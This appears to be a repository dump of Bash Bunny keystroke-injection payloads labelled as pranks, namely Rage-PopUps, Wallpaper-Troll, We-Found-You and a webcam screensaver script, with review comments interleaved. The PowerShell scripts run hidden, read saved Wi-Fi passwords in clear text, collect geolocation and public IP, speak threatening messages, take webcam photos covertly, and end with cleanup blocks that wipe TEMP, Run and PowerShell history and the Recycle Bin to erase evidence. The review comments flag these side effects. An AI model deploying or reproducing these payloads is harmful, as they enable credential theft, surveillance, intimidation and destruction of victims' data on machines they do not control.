# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers
.DESCRIPTION
This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp
for each one of them.
#>
#------------------------------------------------------------------------------------------------------------------------------------
Add-Type -AssemblyName System.Windows.Forms
# The number of times you want it to cycle through your list of questions
$cycles = 3
# List as many questions here as you like, it will cycke through all of them
$msgs = @(
"Are all scammers as dumb as you?"
"Is the pay worth being this big of a loser?"
"Do your parents know what you do for a living?"
"Does you boss know much much you suck at this job?"
)
for ($i=1; $i -le $cycles; $i++) {
Foreach ($msg in $msgs) {
[System.Windows.Forms.MessageBox]::Show($msg , "You're-a-Loser.exe" , 4 , 'Question')
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
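Review bot: The cleanup block removes data this script never created: `rm $env:TEMP\* -r -Force` deletes every file in the user's temp directory and `Clear-RecycleBin -Force` permanently empties the Recycle Bin, which is unrecoverable loss of the user's own files for a payload categorised as Prank. Nothing in the visible script writes to TEMP or the Recycle Bin, so I would drop both lines. `Remove-Item (Get-PSreadlineOption).HistorySavePath` likewise deletes the user's whole command history file rather than anything this run added. The .NOTES block should list exactly what is still removed (the RunMRU values and the PSReadLine history file), since those are the artefacts an analyst would otherwise use to reconstruct the Run-dialog launch.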


@ -0,0 +1,22 @@
# Title: Rage-PopUps
# Description: This payload is meant to make a never ending supply of taunting pop-ups. See Rage-PopUps.ps1 for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Rage-PopUps.ps1')"
QUACK ENTER
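Review bot: The `# Description:` line promises a never ending supply of pop-ups, but the Rage-PopUps script above loops `$cycles = 3` times over four messages and then runs a cleanup block that deletes the temp directory contents, the Run history, the PowerShell history and the Recycle Bin. The header should describe what the payload actually does to the host, for example `# Description: Shows the configured message boxes $cycles times, then clears TEMP, RunMRU, PSReadLine history and the Recycle Bin`.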


@ -0,0 +1,96 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Wallpaper-Troll
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes.
## Description
This program enumerates a target PC to get their Name, GeoLocation (Latitude and Longitude), Public IP, Day password was last set, and wifi passwords
This information will be saved to a file that is then converted to a .BMP image
That image will be saved to their desktop and saved as their wallpaper
Opening the image on their desktop with NotePad will reveal the binary code with a hidden message at the bottom of the file
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/BashBunny/Payloads/BB-Wallpaper-Troll/wp-troll.jpg)
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Wallpaper-Troll)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,412 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Wallpaper-Troll | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and and the SSID and WiFi password of any current or previously connected to networks.
It will take the gathered information and generate a .jpg with that information on show
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned
Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop
#>
#############################################################################################################################################
# this is the message that will be coded into the image you use as the wallpaper
$hiddenMessage = "`n`nMy crime is that of curiosity `nand yea curiosity killed the cat `nbut satisfaction brought him back `n with love -Jakoby"
# this will be the name of the image you use as the wallpaper
$ImageName = "dont-be-suspicious"
#############################################################################################################################################
<#
.NOTES
This will get the name associated with the microsoft account
#>
function Get-Name {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$fn = Get-Name
echo "Hey" $fn >> $Env:temp\foo.txt
echo "`nYour computer is not very secure" >> $Env:temp\foo.txt
#############################################################################################################################################
<#
.NOTES
This is to get the current Latitide and Longitude of your target
#>
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
if ($GL) { echo "`nYour Location: `n$GL" >> $Env:temp\foo.txt }
#############################################################################################################################################
<#
.NOTES
This will get the public IP from the target computer
#>
function Get-PubIP {
try {
$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
}
# If no Public IP is detected function will return $null to avoid sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "No Public IP was detected"
return $null
-ErrorAction SilentlyContinue
}
return $computerPubIP
}
$PubIP = Get-PubIP
if ($PubIP) { echo "`nYour Public IP: $PubIP" >> $Env:temp\foo.txt }
###########################################################################################################
<#
.NOTES
Password last Set
This function will custom tailor a response based on how long it has been since they last changed their password
#>
function Get-Days_Set {
#-----VARIABLES-----#
# $pls (password last set) = the date/time their password was last changed
# $days = the number of days since their password was last changed
try {
$pls = net user $env:USERNAME | Select-String -Pattern "Password last" ; $pls = [string]$pls
$plsPOS = $pls.IndexOf("e")
$pls = $pls.Substring($plsPOS+2).Trim()
$pls = $pls -replace ".{3}$"
$time = ((get-date) - (get-date "$pls")) ; $time = [string]$time
$DateArray =$time.Split(".")
$days = [int]$DateArray[0]
return $pls
}
# If no password set date is detected funtion will return $null to cancel Sapi Speak
# Write Error is just for troubleshooting
catch {Write-Error "Day password set not found"
return $null
-ErrorAction SilentlyContinue
}
}
$pls = Get-Days_Set
if ($pls) { echo "`nPassword Last Set: $pls" >> $Env:temp\foo.txt }
###########################################################################################################
<#
.NOTES
All Wifi Networks and Passwords
This function will gather all current Networks and Passwords saved on the target computer
They will be save in the temp directory to a file named with "$env:USERNAME-$(get-date -f yyyy-MM-dd)_WiFi-PWD.txt"
#>
# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress
# Get Wifi SSIDs and Passwords
$WLANProfileNames =@()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern " : "
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
$WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects =@()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
#get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
try{
$WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
}Catch{
$WLANProfilePassword = "The password is not stored in this profile"
}
#Build the object and add this to an array
$WLANProfileObject = New-Object PSCustomobject
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
$WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
$WLANProfileObjects += $WLANProfileObject
Remove-Variable WLANProfileObject
}
if (!$WLANProfileObjects) { Write-Host "variable is null"
}else {
# This is the name of the file the networks and passwords are saved to and later uploaded to the DropBox Cloud Storage
echo "`nW-Lan profiles: ===============================" $WLANProfileObjects >> $Env:temp\foo.txt
$content = [IO.File]::ReadAllText("$Env:temp\foo.txt")
}
#############################################################################################################################################
<#
.NOTES
This will get the dimension of the targets screen to make the wallpaper
#>
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class PInvoke {
[DllImport("user32.dll")] public static extern IntPtr GetDC(IntPtr hwnd);
[DllImport("gdi32.dll")] public static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
}
"@
$hdc = [PInvoke]::GetDC([IntPtr]::Zero)
$w = [PInvoke]::GetDeviceCaps($hdc, 118) # width
$h = [PInvoke]::GetDeviceCaps($hdc, 117) # height
#############################################################################################################################################
<#
.NOTES
This will get take the information gathered and format it into a .jpg
#>
Add-Type -AssemblyName System.Drawing
$filename = "$env:tmp\foo.jpg"
$bmp = new-object System.Drawing.Bitmap $w,$h
$font = new-object System.Drawing.Font Consolas,18
$brushBg = [System.Drawing.Brushes]::White
$brushFg = [System.Drawing.Brushes]::Black
$graphics = [System.Drawing.Graphics]::FromImage($bmp)
$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height)
$graphics.DrawString($content,$font,$brushFg,500,100)
$graphics.Dispose()
$bmp.Save($filename)
# Invoke-Item $filename
#############################################################################################################################################
<#
.NOTES
This will take your hidden message and use steganography to hide it in the image you use as the wallpaper
Then it will clean up the files you don't want to leave behind
#>
echo $hiddenMessage > $Env:temp\foo.txt
cmd.exe /c copy /b "$Env:temp\foo.jpg" + "$Env:temp\foo.txt" "$Env:USERPROFILE\Desktop\$ImageName.jpg"
rm $env:TEMP\foo.txt,$env:TEMP\foo.jpg -r -Force -ErrorAction SilentlyContinue
#############################################################################################################################################
<#
.NOTES
This will take the image you generated and set it as the targets wall paper
#>
Function Set-WallPaper {
<#
.SYNOPSIS
Applies a specified wallpaper to the current user's desktop
.PARAMETER Image
Provide the exact path to the image
.PARAMETER Style
Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
.EXAMPLE
Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
#>
param (
[parameter(Mandatory=$True)]
# Provide path to image
[string]$Image,
# Provide wallpaper style that you would like applied
[parameter(Mandatory=$False)]
[ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
[string]$Style
)
$WallpaperStyle = Switch ($Style) {
"Fill" {"10"}
"Fit" {"6"}
"Stretch" {"2"}
"Tile" {"0"}
"Center" {"0"}
"Span" {"22"}
}
If($Style -eq "Tile") {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
}
Else {
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
}
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Params
{
[DllImport("User32.dll",CharSet=CharSet.Unicode)]
public static extern int SystemParametersInfo (Int32 uAction,
Int32 uParam,
String lpvParam,
Int32 fuWinIni);
}
"@
$SPI_SETDESKWALLPAPER = 0x0014
$UpdateIniFile = 0x01
$SendChangeEvent = 0x02
$fWinIni = $UpdateIniFile -bor $SendChangeEvent
$ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
}
#----------------------------------------------------------------------------------------------------
function clean-exfil {
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
#----------------------------------------------------------------------------------------------------
Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center
clean-exfil


@ -0,0 +1,26 @@
# Title: Wallpaper-Troll
# Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\WallPaper-Troll.ps1')"
QUACK ENTER
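Review bot: The header comment (`# Category: Prank`, "PLUG AND PLAY") does not disclose what the script started by the `QUACK STRING` line does to the host. The accompanying PowerShell file reads saved Wi-Fi keys with `netsh.exe wlan show profiles ... key=clear`, and its `clean-exfil` function deletes everything under `%TEMP%`, the Run-dialog history, the PowerShell history file and the Recycle Bin. Those side effects destroy data and remove logs, so an operator on an authorised test and a defender triaging this payload both need to see them up front. I would add a header line such as `# Side effects: reads saved Wi-Fi keys; deletes %TEMP% contents, RunMRU, PSReadLine history and Recycle Bin`. The We-Found-You payload header further down has the same gap for its cleanup block.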

Binary file not shown.



@ -0,0 +1,97 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# We-Found-You
This script is ready to run as is. Just download and execute with the provided link.
## Description
This script will get the GeoLocation (Latitude and Longitude) of your target.
Then a page will open in their browser with a map of their current location on it
Their system volume will be turned to max level
And sapi speak with talk through their speakers the message provided or a custom one you provide
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/BashBunny/Payloads/BB-We-Found-You/location.jpg)
## Getting Started
### Dependencies
* Windows 10,11
* Their location services are turned on
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A one liner command in the run box will execute the script on the bash bunny
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-We-Found-You)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,176 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : We-Found-You | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
The targets Location Services must be turned on or this payload will not work
.SYNOPSIS
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are
.DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account.
The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected
Then the script uses Sapi speak to roast their set up and lack of security
#>
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used
#>
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to get the current Latitide and Longitude of your target
#>
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
$GL = Get-GeoLocation
$GL = $GL -split " "
$Lat = $GL[0].Substring(11) -replace ".$"
$Lon = $GL[1].Substring(10) -replace ".$"
Pause-Script
# Opens their browser with a map of their current location
Start-Process "https://www.latlong.net/c/?lat=$Lat&long=$Lon"
Start-Sleep -s 3
# Sets Volume to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
# Sets up speech module
$s=New-Object -ComObject SAPI.SpVoice
$s.Rate = -2
$s.Speak("We found you $FN")
$s.Speak("We know where you are")
$s.Speak("We are everywhere")
$s.Speak("Expect us")
#-----------------------------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
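Review bot: The `.DESCRIPTION` block in the comment-based help at the top does not describe this file: it talks about collecting OS, RAM capacity, public IP, e-mail and Wi-Fi passwords, none of which appears in the code below it. What the code does is resolve latitude and longitude, wait for mouse movement, pass the coordinates to a third-party site in a URL query string, raise the volume, speak, and then delete `%TEMP%` contents, the RunMRU key, the PowerShell history file and the Recycle Bin. The help text should be rewritten to say exactly that, including that location data leaves the machine and that the final block removes files and history the script did not create. The banner's `Target : Windows 7,10,11` should also be reconciled with the README's `Windows 10,11`.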

Binary file not shown.



@ -0,0 +1,26 @@
# Title: We-Found-You
# Description: This payload is meant to open a map in your targets web browser with their current location
# Author: I am Jakoby
# Version: 1.0
# Category: Prank
# Attackmodes: HID, Storage
# Target: Windows 10, 11
# --------------------------------------------------------------------------------------
# THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
# --------------------------------------------------------------------------------------
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\found-you.ps1')"
QUACK ENTER
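Review bot: The `# Target: Windows 10, 11` header line disagrees with the banner of the script this payload launches, which says `Target : Windows 7,10,11`, while the README lists `Windows 10,11`. Readers use the supported-platform claim to judge where this can run, so the three places should agree. Use the set that was actually tested everywhere; if Windows 7 was not tested, the script banner should read `# Target : Windows 10,11`.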


@ -0,0 +1,129 @@
# Title: Title: ScreenSaveR_FuNNN_b/b
# Author: LulzAnarchyANon
# Description: The webcam is opened,and 15 pictures are taken and saved to the camera roll folder.
# The wallpaper settings are then changed so the Photos/Camera Roll folder is used for the screensaver.
# The slide show delay is set to 1 minute, and the slide show speed set to FAST
# Target: Windows 10
# Props: Darren Kitchen and I am Jakoby
# Version: 1.0
# Category: Prank
LED B G 100
ATTACKMODE HID
QUACK GUI
QUACK DELAY 5
QUACK STRING camera
QUACK DELAY 50
QUACK ENTER
QUACK DELAY 1000
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 200
QUACK CONTROL SPACE
QUACK DELAY 1000
QUACK STRING camera
QUACK ALT F4
QUACK DELAY 2000
QUACK GUI r
QUACK DELAY 100
QUACK STRING control desk.cpl, ,@screensaver
QUACK ENTER
QUACK DELAY 200
QUACK STRING P
QUACK DELAY 200
QUACK TAB
QUACK DELAY 100
QUACK TAB
QUACK DELAY 20
QUACK TAB
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 100
QUACK ENTER
QUACK DELAY 50
QUACK SPACE
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK RIGHTARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK DOWNARROW
QUACK DELAY 50
QUACK ENTER
QUACK TAB
QUACK DEALY 50
QUACK SHIFT F
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK TAB
QUACK DELAY 50
QUACK SHIFT S
QUACK DELAY 50
QUACK ENTER
LED G 0
